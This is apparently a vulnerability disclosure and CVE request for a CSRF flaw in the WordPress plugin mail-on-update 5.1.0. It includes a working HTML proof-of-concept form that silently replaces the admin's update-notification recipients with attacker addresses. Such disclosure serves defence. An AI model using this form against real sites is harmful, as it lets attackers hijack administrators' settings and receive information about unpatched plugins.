Can I get 2013 CVE for WordPress plugin mail-on-update CSRF vulnerability. PoC
for "List of alternative recipients" below. Tested 5.1.0 version.
Homepage: http://wordpress.org/extend/plugins/mail-on-update/
Code: http://plugins.svn.wordpress.org/mail-on-update/trunk/
<html><form action="https://example.com/wp/wp-admin/options-general.php?page=mail-on-update"; method="post"
class="buttom-primary">
<input name="mailonupdate_mailto" type="hidden" value="example0 () example com
example1 () example com
example2 () example com
example3 () example com
example4 () example com
example5 () example com
example6 () example com
example7 () example com
example8 () example com
example9 () example com
example10 () example com
henri+monkey () nerv fi" />
<input name="submit" type="submit" value="Save"/></form></html>
If attacker adds random email to that form default user won't get emails and
attacker might be interested to receive these as the email contains information
of available plugin updates.